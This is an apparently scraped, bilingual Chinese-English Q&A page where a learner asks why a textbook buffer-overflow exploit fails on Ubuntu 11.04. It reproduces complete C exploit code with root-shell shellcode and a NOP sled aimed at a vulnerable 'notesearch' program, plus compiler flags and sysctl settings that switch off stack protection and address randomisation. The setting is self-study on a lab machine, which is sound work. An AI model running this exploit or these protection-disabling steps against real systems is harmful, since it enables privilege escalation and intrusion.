在Ubuntu 11.04中禁用堆栈碎片保护 [英] Disabling Stack Smashing Protection in Ubuntu 11.04
问题描述
我在2007年的MacBook上运行32位Ubuntu 11.04,并开始学习缓冲区溢出漏洞。我试图从书中运行示例程序,但是Ubuntu的安全措施使我无法成功执行缓冲区溢出。这是我试图运行的代码:
I'm running 32-bit Ubuntu 11.04 on a 2007 MacBook, and I'm just starting to learn about buffer overflow exploits. I'm trying to run the example programs from a book, but Ubuntu's security measures are making it impossible for me to successfully execute a buffer overflow. Here's the code I'm attempting to run:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
我希望此代码导致段错误,但每次运行它会退出错误检测到堆栈粉碎。我已经尝试编译(使用gcc)以下选项:
I would like this code to result in a segfault, but every time I run it, it quits with the error "stack smashing detected". I've tried compiling (using gcc) with the following options:
-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack
以各种组合,以及所有组合。我也尝试了 $ sysctl -w kernel.randomize_va_space = 0
,然后重新编译,但没有成功。
in various combinations, as well as all together. I've also tried $ sysctl -w kernel.randomize_va_space=0
followed by a recompile, with no success.
如果任何人都可以通过Ubuntu内置的安全措施来了解执行缓冲区溢出的正确方法,那将是非常感谢的。
It would be much appreciated if anyone could shed light on the correct way to execute a buffer overflow, given Ubuntu's built-in security measures
推荐答案
我对现在发生的事情有了更多的了解。给定的代码构造一个缓冲区,然后将其传递给一个名为notesearch的程序,该程序存在缓冲区溢出漏洞。我没有弄清楚如何禁用当前版本的ubuntu的保护措施,但我尝试的方法在我的Ubuntu 9.10虚拟机上工作。也就是说,-fno-stack-protector作为gcc标志工作,当与sysctl kernel.randomize_va_space = 0配对时,允许在堆栈上执行shellcode的缓冲区溢出。有点解决方法,但运行我的虚拟机很适合我,并允许我继续阅读本书中的示例。如果你有兴趣学习漏洞,这本书是一本很棒的书。 这是
I'm a bit more informed on what's going on now. The given code constructs a buffer and then passes it to a program called notesearch that has a buffer overflow vulnerability. I didn't figure out how to disable the protective measures on the current version of ubuntu, but the methods I tried do work on my Ubuntu 9.10 virtual machine. That is, -fno-stack-protector works as a gcc flag, and when paired with sysctl kernel.randomize_va_space=0, buffer overflows that execute shellcode on the stack are permitted. A bit of a workaround, but running my VM suits me well and allows me to continue through the examples in this book. It's a great book if you're interested in learning exploits. Here it is
这篇关于在Ubuntu 11.04中禁用堆栈碎片保护的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!